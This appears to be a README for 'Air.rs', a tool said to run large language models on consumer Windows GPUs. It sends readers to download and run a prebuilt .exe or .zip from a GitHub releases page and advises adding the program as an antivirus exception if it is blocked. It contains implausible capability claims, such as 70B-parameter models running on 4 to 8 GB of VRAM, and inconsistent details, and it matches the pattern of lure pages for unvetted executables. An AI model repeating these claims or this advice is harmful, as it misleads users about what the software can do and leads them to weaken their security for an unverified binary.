Air.rs lets you run a large language model (LLM) on your own Windows computer. You do not need a powerful server or an internet connection. The software runs directly on your consumer GPU using Rust programming language. It supports the latest models designed for text generation, instruction following, and natural language tasks.
Air.rs is designed to work with models like LLaMA and others. It can run models with 70 billion parameters or more, making it suitable for advanced AI tasks such as chatting, summarizing text, and answering questions. It focuses on inference speed and efficiency without needing complex setups.
Before downloading Air.rs, make sure your computer meets these requirements:
- Operating System: Windows 10 or later (64-bit)
- GPU: NVIDIA with at least 4GB VRAM (such as GTX 1650 or better)
- CPU: Quad-core Intel or AMD processor (recommended for best performance)
- RAM: Minimum 16 GB system memory
- Disk Space: At least 10 GB free for models and software
- GPU Drivers: Latest NVIDIA drivers installed (can update via NVIDIA's site)
Air.rs uses your GPU for faster model running. If your GPU has less memory, performance may drop or some models may not work.
You need to download the software before you can run it. This step explains how to get Air.rs on your Windows PC.
-
Click the green "Download Air.rs" badge above or open this link in your web browser:
https://github.com/dinahthreewheel75/Air.rs/releases -
This page shows all the available releases of Air.rs. Look for the latest release (usually at the top).
-
Under the latest release, find the file named something like
Air.rs-windows.ziporAir.rs.exe. -
Click the file link to start downloading. Save the file to your Windows desktop or Downloads folder.
-
Wait for the download to finish before moving on to installation.
These steps will help you install and prepare Air.rs to run on your computer.
If you downloaded a .zip file:
-
Right-click the downloaded ZIP file, then select "Extract All..."
-
Choose a folder where you want to extract the files, like your Desktop.
-
Click "Extract." You should now see a new folder with Air.rs files.
-
Open that folder to find the main executable, usually called
Air.rs.exe.
If you downloaded an .exe file:
-
Simply double-click the
Air.rs.exefile. -
If Windows asks for permission to run this app, click "Yes" or "Run".
No complicated setup is needed. Air.rs runs right out of the box on Windows.
Once Air.rs is installed or extracted, follow these steps to start it:
-
Open the folder containing
Air.rs.exe. -
Double-click
Air.rs.exeto launch the program. -
The program window or a command line window will open.
-
Air.rs will check your system and GPU.
-
Follow any on-screen instructions, such as choosing a model to load.
-
Air.rs will begin running the language model on your GPU.
-
To enter text or prompts, look for the input area in the program window.
-
Type a question or statement and press Enter or click "Run".
-
Air.rs will process the input and show generated text within seconds.
-
You can copy the generated responses for your use.
-
To load different models, check the options menu inside the software.
-
Save your work frequently if you plan to run longer sessions.
Air.rs works with several large language models. To run them, you need to have the model files on your computer.
-
Official public models like LLaMA or open-source ones are available through linked sources.
-
Place model files in a folder you can remember.
-
In Air.rs, set the model path to this folder.
-
LLaMA 7B or 13B models (smaller for testing)
-
Llama 70B for best performance (requires GPU with 8+ GB VRAM)
-
Finetuned variants based on your interest (e.g., instruct-tuned or Indian language models)
Be sure your disk has room for these large files — some models are 5 to 20 GB or more.
Air.rs lets you change settings to improve performance or customize output.
-
GPU settings: Select which GPU to use if you have more than one.
-
Batch size: Controls how many words are processed at once for speed.
-
Temperature: Regulates creativity of AI responses.
-
Max tokens: Limits response length.
Start with default settings and adjust if you want faster or more creative answers.
-
If Air.rs doesn’t start, make sure your GPU drivers are up to date.
-
If the AI slows down or crashes, check you have enough RAM and disk space.
-
Running very large models may require lowering batch size or upgrading hardware.
-
If you see error messages about missing files, confirm you extracted all the program files correctly.
-
Some antivirus programs may block the executable—add Air.rs as an exception if needed.
-
Visit https://github.com/dinahthreewheel75/Air.rs/releases to get updates and ask questions.
-
Read the official documents inside the Air.rs folder for detailed use cases.
-
Explore community forums for tips on custom models and advanced setups.
-
Check for GPU driver updates regularly for best performance.
Air.rs is an open-source project focused on running large language models efficiently on consumer GPUs using Rust. It aims to bring AI capabilities to users who want control, privacy, and speed without relying on online services.
This software is released under an open-source license. Users with programming knowledge can contribute to improving Air.rs by visiting the GitHub page.
If you encounter problems, use GitHub Issues on the Air.rs repository to report bugs or request features.